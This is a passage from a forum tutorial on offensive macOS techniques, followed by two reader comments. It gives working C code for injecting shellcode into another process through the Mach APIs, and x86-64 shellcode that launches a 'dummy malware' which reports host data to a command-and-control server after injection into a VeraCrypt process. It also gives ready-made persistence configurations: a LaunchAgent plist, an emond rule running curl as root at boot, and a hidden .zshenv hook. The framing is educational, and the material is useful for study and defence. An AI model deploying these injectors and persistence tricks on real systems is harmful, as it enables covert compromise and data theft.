Alright, now that we have the shellcode, let’s start writing the actual injector. The main function seems like the natural starting point. The logic is simple: we take a single command-line argument, which should be the process ID (PID) of the target process to inject the shellcode into. Then, we obtain a handle to our task using task_for_pid(). Next, we’ll allocate a memory buffer in the remote task with mach_vm_allocate(). After that, we’ll write our shellcode to the remote buffer with mach_vm_write(). We’ll modify the memory permissions of the remote buffer with mach_vm_protect(). Then, we’ll update the remote thread context to point to the start of the shellcode with thread_create_running(). Finally, we’ll run our shellcode, which will print “Hello World”.

Remember our earlier discussion about the differences between a Mach task thread and a BSD pthread, and the task_for_pid() API call. In order to develop a utility that utilizes task_for_pid(), you’ll need to create an Info.plist file. This file will be embedded into your executable and will enable code signing with the key set to “allow”. Below is an example of the Info.plist:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>com.apple.security.get-task-allow</key>
<true/>
</dict>
</plist>

Note:** not all sections of a program’s virtual memory permit their contents to be interpreted as code by the CPU (i.e., “marked executable”). Memory can be marked as readable (R), writable (W), executable (E), or some combination of the three. For instance, a page marked RW means one can read/write to these addresses in memory, but their contents may not be treated as executable by the CPU. This is a crucial aspect of memory protection and security in modern operating systems.

Executable memory regions are typically marked with the execute (E) permission, allowing the CPU to interpret the contents of these regions as machine instructions and execute them. This is essential for running programs, as the CPU needs to fetch instructions from memory and execute them.

However, allowing arbitrary memory regions to be executable can pose significant security risks, such as buffer overflow attacks or injection of malicious code. Therefore, modern operating systems employ memory protection mechanisms to restrict the execution of code to specific, authorized regions of memory.

By controlling the permissions of memory pages, operating systems can enforce security policies and prevent unauthorized execution of code. For example, writable memory regions that contain data should not be executable to prevent the execution of injected malicious code. Conversely, executable code should not be writable to prevent tampering with the program’s instructions.

Alright, the entry point we converts the PID provided as a string to an integer and calls the inject_shellcode function to inject the shellcode into the target process using the provided PID,

We need to interact with the target process, so we declare a few variables to hold essential information. These include remote_task to represent the task port of the target process, remote_stack to store the address of the allocated memory for the remote stack within the target process, and shellcode_region to keep track of the memory region allocated for the shellcode.

Now, the process begins. We need to get permission to access the target process, so we use the task_for_pid function to obtain the task port. This allows us to manipulate the memory and threads of the target process.

With access granted, we proceed to allocate memory within the target process. We reserve space for both the remote stack and the shellcode using mach_vm_allocate. This ensures that we have a place to execute our code, Once memory is allocated, we write our shellcode into the allocated memory space of the target process using mach_vm_write. This effectively places our code where it needs to be executed.

int inject_shellcode(pid_t pid, unsigned char *shellcode, size_t shellcode_size) {
    task_t remote_task;
    mach_vm_address_t remote_stack = 0;
    vm_region_t shellcode_region;
    mach_error_t kr;

    // Get the task port for the target process
    kr = task_for_pid(mach_task_self(), pid, &remote_task);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to get the task port for the target process: %s\n", mach_error_string(kr));
        return -1;
    }

    // Allocate memory for the stack in the target process
    kr = mach_vm_allocate(remote_task, &remote_stack, STACK_SIZE, VM_FLAGS_ANYWHERE);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to allocate memory for remote stack: %s\n", mach_error_string(kr));
        return -1;
    }

    // Allocate memory for the shellcode in the target process
    kr = mach_vm_allocate(remote_task, &shellcode_region.addr, shellcode_size, VM_FLAGS_ANYWHERE);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to allocate memory for remote code: %s\n", mach_error_string(kr));
        return -1;
    }
    shellcode_region.size = shellcode_size;
    shellcode_region.prot = VM_PROT_READ | VM_PROT_EXECUTE;

    // Write the shellcode to the allocated memory in the target process
    kr = mach_vm_write(remote_task, shellcode_region.addr, (vm_offset_t)shellcode, shellcode_size);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to write shellcode to remote process: %s\n", mach_error_string(kr));
        return -1;
    }

    // Adjust memory permissions for the shellcode
    kr = vm_protect(remote_task, shellcode_region.addr, shellcode_region.size, FALSE, shellcode_region.prot);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to set memory permissions for remote code: %s\n", mach_error_string(kr));
        return -1;
    }

    // Create a remote thread to execute the shellcode
    x86_thread_state64_t thread_state;
    memset(&thread_state, 0, sizeof(thread_state));
    thread_state.__rip = (uint64_t)shellcode_region.addr;
    thread_state.__rsp = (uint64_t)(remote_stack + STACK_SIZE);

    thread_act_t remote_thread;
    kr = thread_create(remote_task, &remote_thread);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to create remote thread: %s\n", mach_error_string(kr));
        return -1;
    }

    // Set the thread state
    kr = thread_set_state(remote_thread, x86_THREAD_STATE64, (thread_state_t)&thread_state, x86_THREAD_STATE64_COUNT);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to set thread state: %s\n", mach_error_string(kr));
        return -1;
    }

    // Resume the remote thread
    kr = thread_resume(remote_thread);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to resume remote thread: %s\n", mach_error_string(kr));
        return -1;
    }

    printf("Shellcode injected successfully!\n");

    mach_port_deallocate(mach_task_self(), remote_thread);

    return 0;
}

To ensure that our shellcode can run, we modify the memory permissions of the allocated memory region containing the shellcode. We use vm_protect to set the appropriate permissions, allowing for execution. Now, it’s time to execute our shellcode. We create a remote thread within the target process using thread_create. This thread will be responsible for running our injected code.

Before we start the thread, we need to set its state. We prepare the thread to execute our shellcode by setting the instruction pointer (rip) to the starting address of the shellcode and the stack pointer (rsp) to the allocated remote stack. Finally, we’re ready to execute our shellcode. We resume the remote thread using thread_resume, allowing it to begin executing the injected code.

If everything goes smoothly, we print a success message indicating that the shellcode was injected successfully. We also clean up any resources used during the injection process by deallocating Mach ports. And that’s it! The entire process of injecting shellcode into a target process on macOS using Mach APIs.

In our injector, we’re injecting shellcode into a target process using Mach APIs in macOS. Now, one significant difference between POSIX threads and Mach threads comes into play here.
POSIX threads utilize the thread local storage (TLS) data structure, which is crucial for managing thread-specific data. However, Mach threads don’t have this concept of TLS.

Now, when we inject our shellcode into the target process and create a remote thread to execute it, we can’t simply point the instruction pointer in the thread context struct and expect everything to work smoothly. Why? Because our shellcode, which is essentially unmanaged code, needs to run in a controlled environment, and transitioning from a Mach thread directly to executing our shellcode might cause issues.

So, to prevent potential crashes or errors, we need to ensure that our shellcode is executed within the context of a fully-fledged POSIX thread. This means that as part of our injection process, we have to somehow promote our shellcode from being executed within the context of a base Mach thread to being executed within the context of a POSIX thread. By doing this, we create a more stable environment for our shellcode to execute, ensuring that when the target process resumes its execution at the start of our shellcode, it does so without any issues. This promotion process is essential for the successful execution of our injected shellcode in user mode without causing crashes or unexpected behavior.

As you can see, we injected our shellcode into the Veracrypt process successfully. The message “Hello World!” was printed, confirming that the shellcode executed as expected and produced the desired output.

However, let’s shift our focus now. Remember the code we previously developed to transmit system data to the C2 server? What if we inject shellcode into the Veracrypt process to execute our dummy malware, enabling it to establish communication with the C2 server and transmit host data?

To execute a shell command, considering I’m running zsh, we need to trigger a syscall to run /bin/zsh -c. For this, we need to utilize execve. What does this do? Simply put, it executes the program referenced by _pathname, which in our case will be the path to our dummy malware executable.

Alright, let’s proceed by writing a simple assembly code to execute /bin/zsh -c '/Users/foo/dummy'. First, we’ll set up a register (rbx) and load the string '/bin/zsh' into it. Once this string is pushed onto the stack, we’ll proceed to load the ASCII values for -c into the lower 16 bits of the rax register. After pushing this -c flag onto the stack, we’ll set the rbx register to point to the -c flag on the stack, as it will be necessary later during the syscall preparation.

Any additional details will be described in comments within the code. At the end of this section, there’s an indirect jump facilitating the execution of subsequent instructions. This jump redirects the program flow to the address stored in the exec subroutine, ensuring the continuity of execution.

global _main

_main:
    xor rdx, rdx        ; Clear rdx register
    push rdx            ; Push NULL onto stack (String terminator)
    mov rbx, '/bin/zsh' ; Load '/bin/zsh' into rbx
    push rbx            ; Push '/bin/zsh' onto stack
    mov rdi, rsp        ; Set rdi to point to '/bin/zsh\0'
    xor rax, rax        ; Clear rax register
    mov ax, 0x632D      ; Load "-c" into lower 16 bits of rax
    push rax            ; Push "-c" onto stack
    mov rbx, rsp        ; Set rbx to point to "-c"
    push rdx            ; Push NULL onto stack
    jmp short dummy     ; Jump to label dummy

exec:
    push rbx            ; Push "-c" onto stack
    push rdi            ; Push '/bin/zsh' onto stack
    mov rsi, rsp        ; Set RSI to point to stack
    push 59             ; Push syscall number
    pop rax             ; Pop syscall number into rax
    bts rax, 25         ; Set 25th bit of rax (AT_FDCWD flag)
    syscall             ; Invoke syscall

dummy:
    call exec                   ; Call subroutine exec
    db '/Users/foo/dummy_m', 0  ; Define string
    push rdx                    ; Push NULL onto stack

Alright, it’s time to try this beauty. As usual, we’ll need to extract the shellcode and test it before using it. And just like that, bingo! We’ve successfully injected our shellcode, triggering our dummy malware. We’re now receiving host information in the C2 server. We can push this further by exploring additional capabilities and attack vectors, even achieve persistence, but I think that’s enough for now.

Executing and sending host information essentially does nothing harmful to your computer. “Dummy” is more about demonstrating how malware can be triggered and how it uses injection techniques to spread. It’s also interesting for defensive evasion or adding backdoor capabilities. This was just a quick look at the Mach API, covering system calls and code injection techniques, and how an attacker can utilize something like process injection to achieve malicious behavior. In this example, we’ve used a legitimate process to inject and execute “malicious code,” potentially exposing host data to an attacker. This can be pushed further, but we’re here just to learn, and I encourage you to experiment with caution. Code injection must be used with care.

I hope you’ve learned something from this simple introduction, and there’s a lot more to explore beyond what we’ve touched on here. All the code used here can be found at Github

Persistence

Alright, let’s discuss persistence. It’s a crucial step once we’ve gained initial access and understood the situation. Typically, we aim to establish some form of persistence. We don’t want to rely solely on that initial access point because it could be terminated for various reasons. There might be issues with the user’s computer, or the target could decide to shut everything down. So, it’s important to have a method in place to maintain access to the target.

While there are several persistence techniques for MacOS systems, many of them require root privileges to perform, or exploit some sort of low-level vulnerability to escalate. To keep things simple, let’s focus on Userland Persistence. First, I’ll describe some well-known persistence techniques and some lesser-known ones, so you can understand how these techniques work and how malware can use them. Alright, let’s go :

Before I began writing this article, I analyzed some samples targeting macOS and read some threat reports. One commonality among them is that launch agents and launch daemons are by far the most prevalent methods of persistence. Why, you might ask? Well, it’s because of their simplicity and flexibility. You could liken them to the startup folder persistence equivalent on Windows. However, detecting such techniques is relatively easy. Remember when we mentioned LOLBins? Well, think of it as a similarly straightforward and common method, and the detection methods are also well-known.

LaunchAgent & LaunchDaemon

LaunchAgents and LaunchDaemons are key components of macOS, responsible for managing processes automatically. LaunchAgents are typically located in the ~/Library/LaunchAgents directory for user-specific tasks, triggering actions when a user logs in. On the flip side, LaunchDaemons are situated in /Library/LaunchDaemons, initiating tasks upon system startup.

Although LaunchAgents primarily operate within user sessions, they can also be found in system directories like /System/Library/LaunchAgents. However, modifying these files would require disabling System Integrity Protection (SIP), which is not recommended due to potential security risks. In contrast, LaunchDaemons, operating at a system level, require administrator privileges for installation and typically reside in /Library/LaunchDaemons.

Both LaunchAgents and LaunchDaemons are configured using .plist files, specifying commands or referencing executable files for execution.

LaunchAgents are suitable for tasks requiring user interaction, while LaunchDaemons are better suited for background processes. Let’s take a LaunchAgents example:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.pre.foo.plist</string>
    <key>ProgramArguments</key>
    <array>
        <string>/Users/foo/dummy</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>

So, what does this all mean? Basically, when we want our binary to run every time a user logs onto the system, we just tell launchd to handle it. It’s pretty straightforward, right? But here’s where it gets interesting: there’s something called emond, a command native to macOS located at /sbin/emond. This little tool is quite handy; it accepts events from various services, processes them through a simple rules engine, and takes action accordingly. These actions can involve running commands or performing other tasks.

Now, emond isn’t just any ordinary command. It functions as a regular daemon and is kicked off by launchd every time the operating system starts up. Its configuration file, where we set when and how emond runs, hangs out with the other system daemons at /System/Library/LaunchDaemons/com.apple.emond.plist.

But how can we use this event monitoring daemon to establish persistence? Well, the mechanics of emond are pretty much like any other LaunchDaemon. It’s launchd’s job to fire up all the LaunchDaemons and LaunchAgents during the boot process. Since emond starts up during boot, if you’re using the _run command_ action, you need to be mindful of what command you’re executing and when during the boot process it’ll happen.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
    <dict>
        <key>name</key>
        <string>foo</string>
        <key>enabled</key>
        <true/>
        <key>eventTypes</key>
        <array>
            <string>startup</string>
        </array>
        <key>actions</key>
        <array>
            <dict>
                <key>command</key>
                <string>sleep</string>
                <key>user</key>
                <string>root</string>
                <key>arguments</key>
                <array>
                    <string>10</string>
                </array>
                <key>type</key>
                <string>RunCommand</string>
            </dict>
            <dict>
                <key>command</key>
                <string>curl</string>
                <key>user</key>
                <string>root</string>
                <key>arguments</key>
                <array>
                    <string>dns.log</string>
                </array>
                <key>type</key>
                <string>RunCommand</string>
            </dict>
        </array>
    </dict>
</array>
</plist>

So, in our SampleRules.plist file, we have a setup called ‘foo’. First off, it waits for 10 seconds after startup. This is done using a command called sleep. Next, we use curl to simply send a DNS query record to verify that it’s actually working, and once the service has started, your event will immediately fire and trigger any actions. emond isn’t a new way to monitor events on macOS, but it’s considered innovative when used for offensive purposes.

Bash Profiles & Zsh Startup

Let’s talk about those bash profiles on Linux systems. They’re essentially scripts containing commands that run whenever you open up a terminal, Instead of bash profiles, zsh has its own version called start files, which serve the same purpose. But here’s the twist: zsh also comes with an extra file called the zsh environment file. This file is more powerful because it kicks in more often, ensuring persistence across different interactions with zsh.

The cool thing is that even if you just type in a command like zsh -c, this shell environment file still gets sourced. This means your persistence setup remains strong, no matter how you’re using shell.

~ > cat .zshenv
. "/Users/foo/startup.sh" > /dev/null 2>&1&

Now, every time you open a terminal and Z shell initializes, it will automatically execute the startup.sh script, ensuring that your desired commands or actions are performed consistently.

Now, to execute it in the background, we use setopt NO_MONITOR. This command disables job monitoring and then runs the startup.sh script in the background. As a result, the script runs every time you open a terminal with Z shell, but it runs silently in the background.

So, you get the gist of it, right? These are some of the known techniques I’ve come across, especially in samples. There’s more like Cron jobs, Dock shortcuts, and more. But to be honest, if I were to write specifically for macOS, I’d go multi-stage and avoid any known techniques out there. Simply put, once a technique is made public, it’s burned. So , I’ll focus more on developing something that has a longer lifespan.

Nowadays, with all the public scripts and post-exploitation frameworks out there, attackers try to get the job done easily without wasting time or energy. Writing malware takes time and energy, so they aim for low-hanging fruit that’s just acceptable for a malware author. Because once the malware is burned, it’s burned. But if it’s a long-term operation, it takes time and skill to put together, and you can’t risk the malware getting burned by the first few infection. But for a red team exercise, for example, you’d test low-hanging fruit and an easy way to get in before emulating advance threats.

Also, a skilled attacker can get past most security setups with just a simple MSFvenom shellcode. Yep, so at the end, it comes down to the simplest attacks. Usually, at this point in the article, I’ve added a section for writing a simple malware, where we take all that we’ve covered and put it into one malware(rootkit). However, considering some thought, adding more code might just make things drag on and get confusing. We can save that for another article where we can really dive into the whole process because rootkits are quite advanced pieces of code and require knowledge about the kernel and low-level system programming. Since we just covered the surface here, I don’t think a rootkit would be a match for this article; it needs its own article.

But hey, since we’ve already covered code injection pretty extensively, we’ll get into the fancy stuff later.

Conclusion

In conclusion, I hope that you’ve enjoyed and learned something from this article. We’ve covered a broad array of topics related to the macOS architecture and API, although we’ve only scratched the surface. By delving into techniques and writing simple code using the Mach API, we’ve gained a deeper understanding of the environment, its features, and its security. We’ve covered fundamental concepts like code injection and simple persistence techniques, and we’ve even seen macOS syscalls in action through examples. Until next time.

References

cicada · March 9, 2024, 4:39am

Fantastic resource. Thank you for taking the time to make this!

0xf00I · March 9, 2024, 3:47pm

Thanks, appreciate it